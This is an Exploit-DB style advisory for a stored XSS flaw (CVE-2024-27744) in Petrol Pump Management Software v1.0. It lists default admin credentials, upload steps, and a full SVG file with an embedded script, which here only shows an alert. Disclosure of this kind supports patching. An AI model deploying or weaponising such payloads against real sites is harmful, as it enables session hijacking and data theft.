Petrol Pump Management Software v.1.0 - Stored Cross Site Scripting via SVG file

vendor:

Petrol Pump Management Software

by:

Shubham Pandey

6.1

CVSS

HIGH

Cross Site Scripting (XSS)

CWE

Product Name: Petrol Pump Management Software

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: CVE-2024-27744

CPE: a:petrol_pump_management_software:petrol_pump_management_software:1.0

Metasploit:

Other Scripts:

Platforms Tested: Windows, Linux

2024

Petrol Pump Management Software v.1.0 – Stored Cross Site Scripting via SVG file

A Cross Site Scripting vulnerability was found in Petrol Pump Management Software v.1.0. This vulnerability allows an attacker to execute malicious code by uploading a specially crafted SVG file to the 'image' parameter in the profile.php component. By exploiting this vulnerability, an attacker can conduct various attacks such as stealing sensitive data, session hijacking, or defacing the website.

Mitigation:

To mitigate this vulnerability, input validation should be implemented to ensure that uploaded files do not contain malicious scripts or code. Additionally, sanitizing user inputs and encoding special characters can help prevent XSS attacks.

Source

Exploit-DB raw data:

# Exploit Title: Petrol Pump Management Software v.1.0 - Stored Cross Site Scripting via SVG file 
# Date: 01-03-2024
# Exploit Author: Shubham Pandey
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html
# Version: 1.0
# Tested on: Windows, Linux
# CVE : CVE-2024-27744
# Description: Cross Site Scripting vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the image parameter in the profile.php component.
# POC:
1. Here we go to : http://localhost/fuelflow/index.php
2. Now login with default username=mayuri.infospace@gmail.com and
Password=admin
3. Now go to "http://localhost/fuelflow/admin/profile.php"
4. Upload the xss.svg file in "Image" field
5. Stored XSS will be present in "
http://localhost/fuelflow/assets/images/xss.svg" page
6. The content of the xss.svg file is given below:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
>
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
  <script type="text/javascript">
    alert("XSS by Shubham Pandey");
  </script>
</svg>
# Reference:
https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27744.md